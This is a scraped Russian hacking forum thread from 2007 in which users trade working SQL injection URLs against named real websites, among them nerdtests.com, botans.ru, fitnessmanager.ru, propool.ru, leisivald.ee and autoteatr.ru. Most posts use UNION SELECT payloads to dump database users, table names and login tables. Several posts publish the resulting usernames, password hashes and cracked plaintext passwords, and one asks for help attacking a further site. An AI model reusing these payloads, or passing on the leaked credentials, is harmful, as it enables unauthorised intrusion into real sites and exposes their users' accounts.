Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

28.04.2007, 23:09
|
|
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме: 1062869
Репутация:
136
|
|
Код HTML:
http://www.nerdtests.com/pics.php?id=-64+union+select+1,2,3,concat_ws(char(5 8),user,password),5,6,7+from+mysql.user+limit+6,1--
|
|
|

29.04.2007, 08:08
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме: 1106266
Репутация:
366
|
|
Код:
http://www.ahfx.net/weblog.php?article=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(table_name,0x71),0x71),3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+18,1/*
|
|
|

29.04.2007, 14:13
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме: 3405508
Репутация:
1745
|
|
Код:
http://www.ontario-tut.ru/prihoj_big.php?id=-8+union+select+1,2,user(),concat(database(),char(58),version()),5,6,7,8,9,10,11,12,13/*
Код:
http://ww.trizway.com/show.php?id=-41+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,14,15+from+subscriber/*&pg=2
author
news
|
|
|

29.04.2007, 19:27
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме: 921520
Репутация:
572
|
|
sql-inj
Сайт: http://www.botans.ru
уязвимость: http://www.botans.ru/study.php?groupid=2'
подобранные таблицы: users
подобранные поля: username,pass,email,id
193 организмa
http://www.botans.ru/study.php?groupid=-2+union+select+1,2,3,4,5,concat_ws(0x3a,id,usernam e,pass,email)+from+users/*
|
|
|

29.04.2007, 20:09
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме: 921520
Репутация:
572
|
|
sql-continued
Forcer
Металинк Фитнес Менеджер:
нашел users : login,password,email,id
marina:ce5225d01c39d2567bc229501d9e610d (pass: marina)
http://fitnessmanager.ru/index.php?page=catalog&action=position_list&id=-96+union+select+1,2,3,4,5,concat_ws(0x3a,id,login, password,email),7,8,9,10+from+users+limit+1,1/*
но практической пользы никакой - есть админка (http://fitnessmanager.ru/admin), но там другие данные.
|
|
|

29.04.2007, 23:29
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме: 1604641
Репутация:
590
|
|
Код:
http://zvisti.com.ua/info.php?id=-421%20UNION%20SELECT%201,2,3,4,5,table_name,7,8,9,10,11,12+from+INFORMATION_SCHEMA.TABLES+limit+15,1/*
Код:
http://sodruzestvo.com/news/news.php?nid=-3+union+select+1,user(),3/*
=\
|
|
|

30.04.2007, 01:08
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
бильярдец)
propool.ru
Код:
http://www.propool.ru/news.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,user_password),6,7,8,9,10,11+from+bb_users+limit+1,1/*
Vladimir:9497a5313079f955e60747fed4639ae6: piraxy
админка защищена .htaccess'ом... =\
|
|
|

30.04.2007, 03:27
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме: 2132613
Репутация:
1365
|
|
Вот решил Эстонию пощупать :
www.leisivald.ee
Код:
http://www.leisivald.ee/index.php?b=-45+union+select+concat(login,char(58),password),2+from+users/*
aina:462b87e9b978289beae59ff7ed7f4799
kaius:c2ea7f63c808abc0cf77b59226f3775b
|
|
|

30.04.2007, 10:11
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Help sql-inj: www.autoteatr.ru
Код:
http://www.autoteatr.ru/catalog.php?subid=114
http://www.autoteatr.ru/catalog.php?subid=115-1
http://www.autoteatr.ru/catalog.php?subid=114'
Дошёл до 40 колонок (скока же их там?) - не получается составить правильный запрос к БД.
|
|
|

30.04.2007, 10:22
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме: 6860213
Репутация:
378
|
|
http://www.autoteatr.ru/catalog.php?subid=-1+union+select+concat(convert(username+using+cp125 1),0x3a,convert(user_password+using+cp1251))+from+ phpbb_users+limit+1,2/*
Mixa:runner
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|